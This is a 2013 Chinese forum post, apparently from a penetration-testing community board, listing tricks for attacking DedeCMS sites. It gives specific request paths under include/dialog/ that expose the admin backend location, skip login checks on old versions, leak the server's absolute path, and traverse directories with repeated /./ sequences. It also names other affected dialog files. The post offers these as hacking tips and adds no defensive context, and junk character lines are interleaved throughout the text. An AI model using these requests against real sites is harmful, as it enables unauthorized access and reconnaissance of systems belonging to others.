中国网络渗透测试联盟
标题:
dedecms爆后台文件技巧
[打印本页]
作者:
admin
时间:
2013-4-16 16:50
标题:
dedecms爆后台文件技巧
1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理
0 |+ p$ e( H3 K/ z @* s0 G
+ |4 s7 c( [8 t( t. m8 X2 F
员帐号,新版本的就直接转向了后台.
/ ]4 B0 i, P1 L/ O/ W. Z2 Q
4 {2 b9 O+ ^! R4 x: |
2.include/dialog/config.php会爆出后台管理路径
& D, k% t4 A3 l0 I
3 B* U6 G0 P+ J: `9 u+ J+ H# z
3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录
7 o* }4 W, Z! x6 l1 F
! P6 {2 F1 E2 f' _* i9 _
4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径.
# Q1 U6 W$ `# ?( Z' D9 m
5 z# O) n3 b& p! [6 ^
5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉
3 p5 k, n/ D4 D; C# ]" J' R
]3 }! }) Y: Z: G. p
到根目录去.不过这些版本的访问地址有些不同.
/ R/ a) o* |* u' ~/ ^3 C# O
地址为require/dialog/select_soft.php?activepath=/././././././././
1 S7 d7 l/ F- T+ O, s$ o7 i
9 g& J/ P3 z1 H) J
include\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦..
" m1 z% | P& v, q, M, l
存在相同问题的文件还有
1 w7 a9 _* E" x
include\dialog\select_images.php
7 T$ l0 D+ g& n# h0 M0 c. J
include\dialog\select_media.php
, p2 O' J+ [# r4 M3 g
include\dialog\select_templets.php
# v' Y2 Q1 U4 [# m: ]1 r
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2